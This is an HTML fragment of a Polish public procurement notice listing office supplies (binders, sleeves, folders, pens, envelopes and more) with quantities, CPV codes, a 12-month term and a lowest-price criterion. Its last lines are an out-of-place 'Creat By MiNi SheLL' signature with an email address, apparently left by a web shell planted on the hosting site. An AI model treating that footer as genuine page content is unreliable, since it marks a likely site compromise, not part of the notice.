<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Bloczek samoprzylepny wymiar 75x75 mm	60 szt,
2 Bloczek samoprzylepny wymiar 15x50 mm	5 szt,
3 Bloczek notes nieklejony	5 szt,
4 Zakładki indeksujące	20 szt,
5 Segregator A4 kolor czarny szerokość grzbietu 75 mm	15 szt,
6 Segregator A4 kolor czerwony szerokość grzbietu 75 mm	15 szt,
7 Segregator A4 kolor żółty szerokość grzbietu 75 mm	10 szt,
8 Segregator A4 kolor zielony szerokość grzbietu 75 mm	10 szt,
9 Koszulki cienkie	45 opakowań po 100 szt,
10 Koszulki poszerzane 	18 opakowań po 10 szt,
11 Płyta CD-R 80 min VERBATIM lub równoważna 	75 szt,
12 Długopis automatyczny	40 szt,
13 Niebieski wkład	40 szt,
14 Teczka kartonowa wiązana	100 szt,
15 Teczka tekturowa wiązana wzmacniana	120 szt,
16 Teczka tekturowa z powiększonymi grzbietami	100 szt,
17 Zakreślacze kolorowe	5 opakowań po 4 szt,
18 Zszywacz	2 szt,
19 Korektor w płynie	5 szt,
20 Koperta C4	4 opakowania po 50 szt,
21 Koperta C5	2 opakowania po 50 szt,
22 Długopis niebieskie ze skuwką	10 szt,
23 Ołówki	 12 szt,
24 Klips do papieru 19 mm	5 opakowań po 12 szt,
25 Klips do papieru 32 mm	5 opakowań po 12 szt,
26 Spinacze krzyżakowe	2 opakowania po 50 szt,
27 Obwoluty plastikowe  	2 opakowania po 10 szt,
28 Taśma samoprzylepna	5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com